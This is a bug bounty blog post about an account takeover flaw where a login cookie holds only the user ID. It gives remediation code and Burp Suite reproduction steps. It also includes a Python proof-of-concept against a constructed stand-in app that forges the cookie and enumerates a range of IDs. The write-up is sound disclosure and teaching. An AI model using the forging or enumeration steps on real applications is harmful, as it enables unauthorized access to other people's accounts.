Critical Account Takeover Vulnerability

Hello hackers, welcome to another blog post on my latest vulnerability finding on a private bug bounty program.

 

Introduction:

Protecting user accounts and maintaining their privacy is critical in today's connected digital world. Unfortunately, flaws in authentication mechanisms can leave users exposed to unauthorized access and account takeover. In this blog post, we will cover the vulnerability, its impact and mitigation, and the steps to reproduce it.
 

Understanding The Vulnerability: 

As part of the authentication process, when we log in to the application the server sets a cookie named auth_uf. The value of that cookie is predictable because it is nothing more than the user ID of the account that just logged in. Nothing ties the cookie to the login that produced it: there is no random session identifier, no signature and no server-side lookup, so the server treats whoever presents auth_uf=<id> as user <id>. An attacker therefore only needs to know or guess a victim's user ID and substitute it for their own in the cookie to take over the victim's account, without ever knowing the victim's password.
 

Impact:

The consequences of this vulnerability are severe. Once an attacker gains control over another user's account, they can access personal information, sensitive data, and even perform unauthorized actions on behalf of the compromised user. This could include making unauthorized purchases, altering account settings, posting malicious content, or carrying out identity theft. The implications are far-reaching, affecting both individuals and organizations that rely on the application.
 

Remediation:

Addressing this critical vulnerability requires changing how the application identifies a logged-in user, not just hiding the cookie. Recommended remediation steps:

   1) Implement secure session management: on login, generate a random session identifier (at least 128 bits from a cryptographically secure generator), store the mapping from identifier to user on the server, and resolve the user from that mapping on every request. The user ID must never be read from anything the client controls.
   2) Employ secure cookie handling: set the session cookie with the Secure, HttpOnly and SameSite attributes, scope it with Path and the __Host- prefix, and invalidate it on logout and after a timeout.
   3) If a user identifier must live in the cookie, sign it (for example with an HMAC under a server-held key) or encrypt it, and reject any cookie whose signature does not verify.
   4) Implement multi-factor authentication (MFA). MFA raises the bar for credential attacks, but it does not fix this bug on its own: a forged auth_uf cookie bypasses the login flow, MFA included, so it must be combined with the session fix above.
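The following is an added example, not code from the affected application or this post: it models the cookie design described above (the cookie value is the user ID) beside two hardened designs, a random server-side session token and an HMAC-signed user ID. Function names, the __Host-session cookie name and the in-memory session store are assumptions made for illustration.

```python
# Added example (not the vulnerable application's code). Names are assumptions.
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie


# --- Vulnerable design: the cookie value IS the user ID -----------------------
def issue_session_vulnerable(user_id: int) -> str:
    # Later requests are "authenticated" by trusting whatever number comes back.
    return f"auth_uf={user_id}"


def resolve_user_vulnerable(cookie_header: str):
    c = SimpleCookie()
    c.load(cookie_header)
    if "auth_uf" not in c:
        return None
    # No signature, no server-side check: any integer the client sends wins.
    return int(c["auth_uf"].value)


# --- Hardened design 1: random opaque token, resolved server-side -------------
SESSIONS = {}  # token -> user_id; stand-in for a database or cache


def issue_session_secure(user_id: int) -> str:
    token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, unguessable
    SESSIONS[token] = user_id
    return token


def set_cookie_header(token: str) -> str:
    # __Host- prefix forces Secure, no Domain and Path=/; HttpOnly keeps JS out;
    # SameSite=Lax limits cross-site sends.
    return f"__Host-session={token}; Secure; HttpOnly; SameSite=Lax; Path=/"


def resolve_user_secure(cookie_header: str):
    c = SimpleCookie()
    c.load(cookie_header)
    if "__Host-session" not in c:
        return None
    # The user is whatever the server recorded for this token, or nobody.
    return SESSIONS.get(c["__Host-session"].value)


def logout_secure(token: str) -> None:
    SESSIONS.pop(token, None)  # invalidate on logout; the cookie alone is now useless


# --- Hardened design 2: if an ID must be in the cookie, sign it ---------------
SECRET_KEY = secrets.token_bytes(32)  # assumption: loaded from a secrets manager in production


def sign_user_id(user_id: int) -> str:
    uid = str(user_id).encode()
    mac = hmac.new(SECRET_KEY, uid, hashlib.sha256).hexdigest()
    return f"{user_id}.{mac}"


def verify_signed(value: str):
    try:
        uid_str, mac = value.rsplit(".", 1)
        expected = hmac.new(SECRET_KEY, uid_str.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(mac, expected):  # constant-time comparison
            return None
        return int(uid_str)
    except ValueError:  # no "." separator, or a non-numeric ID
        return None
```

With the vulnerable functions, swapping the number in auth_uf changes who you are; with either hardened design, a guessed ID or a tampered value resolves to no user at all.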
 

Proof of Concept:

 Steps to reproduce: 

   1) Log in to the application with your own credentials.
   2) Capture this login request in Burp Suite, and capture its response as well (the response is where the server sets the auth_uf cookie). [Response as attached]
   3) Log out of your account and return to the login page.
   4) Enter any random username and password, capture the request in Burp Suite, and capture its response too.
   5) Replace that failed-login response with the successful response captured in step 2, changing only the auth_uf value to the victim's user ID.
   6) Forward it and you will be logged in to the victim's account.

 The response-swap works because the browser stores whatever Set-Cookie header it receives; the same result can be obtained by setting auth_uf to the victim's user ID directly in a request, since the server never checks where the value came from.
 
 
      Image 1: Enter a random username and password.
      Image 2: Capture the request in Burp Suite.

      Image 3: Response to the random username and password.

      Image 4: Replace the response with the original one, changing auth_uf to the victim's user ID.

      Image 5: Successfully logged in to the victim's account.
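As an added example, not the target's code or the author's own script, the steps above automated against a small WSGI stand-in for the vulnerable application. The /login and /account routes, the two user records and their passwords are constructed for the demo; only the auth_uf cookie behaviour is taken from the post. It also goes one step further than the write-up and walks a range of IDs, which is how you would show the reviewer that every account, not just one, is reachable.

```python
# Added example (not the vulnerable application's code). Routes and users are constructed.
from http.cookies import SimpleCookie
from io import BytesIO
from urllib.parse import parse_qs

# Constructed sample data standing in for the application's user table.
USERS = {
    "attacker": {"id": 1001, "password": "attacker-pw", "email": "attacker@example.test"},
    "victim":   {"id": 1002, "password": "victim-pw",   "email": "victim@example.test"},
}
BY_ID = {u["id"]: u for u in USERS.values()}


def vulnerable_app(environ, start_response):
    """Login sets auth_uf=<user id>; every other route trusts that number."""
    path, method = environ["PATH_INFO"], environ["REQUEST_METHOD"]
    if path == "/login" and method == "POST":
        size = int(environ.get("CONTENT_LENGTH") or 0)
        form = parse_qs(environ["wsgi.input"].read(size).decode())
        user = USERS.get(form.get("username", [""])[0])
        if not user or user["password"] != form.get("password", [""])[0]:
            start_response("401 Unauthorized", [("Content-Type", "text/plain")])
            return [b"bad credentials"]
        start_response("200 OK", [("Content-Type", "text/plain"),
                                  ("Set-Cookie", f"auth_uf={user['id']}; Path=/")])
        return [b"logged in"]
    if path == "/account":
        c = SimpleCookie()
        c.load(environ.get("HTTP_COOKIE", ""))
        try:
            user = BY_ID.get(int(c["auth_uf"].value)) if "auth_uf" in c else None
        except ValueError:
            user = None
        if not user:
            start_response("401 Unauthorized", [("Content-Type", "text/plain")])
            return [b"not logged in"]
        start_response("200 OK", [("Content-Type", "text/plain")])
        return [user["email"].encode()]  # the victim's data, keyed only by the cookie
    start_response("404 Not Found", [("Content-Type", "text/plain")])
    return [b"no such route"]


def call(app, method, path, body=b"", cookie=""):
    """Minimal in-process WSGI client: returns (status, headers dict, body bytes)."""
    environ = {"REQUEST_METHOD": method, "PATH_INFO": path, "wsgi.input": BytesIO(body),
               "CONTENT_LENGTH": str(len(body)), "HTTP_COOKIE": cookie}
    captured = {}

    def start_response(status, headers):
        captured["status"], captured["headers"] = status, headers

    out = b"".join(app(environ, start_response))
    return captured["status"], dict(captured["headers"]), out


def takeover(app, victim_id, username="attacker", password="attacker-pw"):
    """Steps 1-6: log in with our own account, then present the victim's id instead."""
    status, headers, _ = call(app, "POST", "/login",
                              f"username={username}&password={password}".encode())
    if not status.startswith("200"):
        raise RuntimeError(f"own login failed: {status}")
    own_cookie = headers["Set-Cookie"].split(";")[0]  # step 2: e.g. auth_uf=1001
    forged = f"auth_uf={victim_id}"                   # step 5: swap in the victim's id
    status, _, body = call(app, "GET", "/account", cookie=forged)  # step 6
    return status.startswith("200"), own_cookie, body.decode()


def enumerate_ids(app, id_range):
    """Because ids are predictable, walk a range and collect every account that answers."""
    hits = {}
    for uid in id_range:
        status, _, body = call(app, "GET", "/account", cookie=f"auth_uf={uid}")
        if status.startswith("200"):
            hits[uid] = body.decode()
    return hits


if __name__ == "__main__":
    print(takeover(vulnerable_app, 1002))          # (True, 'auth_uf=1001', 'victim@example.test')
    print(enumerate_ids(vulnerable_app, range(1000, 1005)))
```

The client never sends the victim's password; the only thing it changes is the number in auth_uf, which is exactly the manipulation shown in Image 4.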
 
I hope you discovered something new. Stay tuned for more vulnerability blogs!


Stay informed, stay vigilant, and stay secure!